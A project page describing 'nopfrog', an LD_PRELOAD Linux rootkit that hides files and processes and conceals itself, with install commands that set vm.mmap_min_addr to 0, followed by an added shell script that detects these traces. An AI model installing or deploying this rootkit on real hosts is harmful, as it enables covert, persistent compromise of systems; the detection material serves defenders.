nopfrog is a simple LD_PRELOAD rootkit for x64 Linux that uses the binary rewriting method outlined in zpoline to exhaustively hook syscalls. Unlike most LD_PRELOAD rootkits, which hook the glibc syscall wrappers and hope for the best, nopfrog can intercept and modify all raw syscalls from both statically and dynamically linked programs, without ptrace, changing the target's source, recompiling the kernel or inserting an LKM.
WORK IN PROGRESS!

Features:

- File hiding
  - Hooks `openat()` and `getdents64()` to hide files containing a magic string in their name (e.g. `__pwned__a.txt`)
- Process hiding
  - Hooks `getdents64()` to hide processes with magic strings in their names from `ps`, `top`, etc.
  - Hooks `kill()` to prevent the victim from terminating hidden processes
- Stealth
  - Filters rootkit shared objects from `ldd` output, `/proc/<pid>/maps` and `/proc/<pid>/smaps`
  - Backs up the existing `/etc/ld.so.preload` file and serves a fake one to the user
- Anti-RE
  - XORs out (most) sensitive strings and cleans memory

TODO:

- Hiding files and processes by GID (in progress)
- Anti-VM
- Easy setup and install scripts (in progress)
- Network hiding
Installation:

```
git clone --recursive https://github.com/mad-cat-lon/nopfrog
cd nopfrog
sudo ./easy_install.sh
```

Set `/proc/sys/vm/mmap_min_addr` to 0:

```
sudo sh -c "echo 0 > /proc/sys/vm/mmap_min_addr"
```

Usage:

```
LIBZPHOOK=./nopfrog.so LD_PRELOAD=./libzpoline.so [program you wish to run]
```
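The setup above depends on two things a defender can look for: `vm.mmap_min_addr` must be 0 so that a page can be mapped at virtual address 0 (where the zpoline trampoline lives), and the shared objects have to be pulled in through `LD_PRELOAD` or `/etc/ld.so.preload`. The POSIX shell script below is an added example written for this page, not part of nopfrog or zpoline. It flags a zero `mmap_min_addr`, a mapping that starts at address 0 in a `/proc/<pid>/maps` file, and an `/etc/ld.so.preload` that names a library. Each check takes a file path and `audit_host` takes a root prefix, so the same functions can be run against the live host or against a constructed directory tree; the sample entries used for testing are made up for this example and are not output from any real host.

```shell
#!/bin/sh
# Added example for this page (not part of nopfrog or zpoline): audit a host
# for the preconditions and side effects of a zpoline-style LD_PRELOAD hook.
# Every check reads a file path so it can be run against constructed input.

# vm.mmap_min_addr = 0 lets a process map page 0, which the address-0
# trampoline needs. Returns 0 (true) when the sysctl file holds 0.
mmap_min_addr_is_zero() {
    [ -r "$1" ] || return 1
    read -r value < "$1"
    [ "$value" -eq 0 ] 2>/dev/null
}

# True if a /proc/<pid>/maps file has a region whose start address is 0
# (the kernel prints addresses zero-padded, e.g. "00000000-00001000 rwxp ...").
maps_has_zero_page_mapping() {
    grep -Eq '^0+-[0-9a-f]+ ' "$1" 2>/dev/null
}

# True if an ld.so.preload file names at least one library,
# i.e. contains a non-blank line that is not a comment.
preload_lists_library() {
    grep -Eq '^[[:space:]]*[^#[:space:]]' "$1" 2>/dev/null
}

# Run every check under a root prefix: "" for the live host, or a constructed
# tree for testing. Prints each finding; the return value is the finding count.
audit_host() {
    root="${1:-}"
    findings=0
    if mmap_min_addr_is_zero "$root/proc/sys/vm/mmap_min_addr"; then
        echo "FINDING: vm.mmap_min_addr is 0, page-0 mappings are allowed"
        findings=$((findings + 1))
    fi
    if maps_has_zero_page_mapping "$root/proc/self/maps"; then
        echo "FINDING: this process has a mapping starting at address 0"
        findings=$((findings + 1))
    fi
    if preload_lists_library "$root/etc/ld.so.preload"; then
        echo "FINDING: /etc/ld.so.preload names a library:"
        sed 's/^/    /' "$root/etc/ld.so.preload"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Audit the live host when the script is run directly;
# the exit status is the number of findings.
audit_host ""
```

Two caveats follow from the feature list itself. The rootkit filters its objects out of `/proc/<pid>/maps` and serves a fake `/etc/ld.so.preload`, and the page does not say whether the address-0 mapping is filtered as well, so a hooked process may report nothing; run the checks from a process that is not subject to the preload, or offline against a mounted image, rather than trusting a shell on the suspect host. The strongest mitigation is also the simplest: leaving `vm.mmap_min_addr` at its non-zero default denies the page-0 mapping the trampoline requires, and a value of 0 on a host that has no reason to allow it is worth an alert on its own.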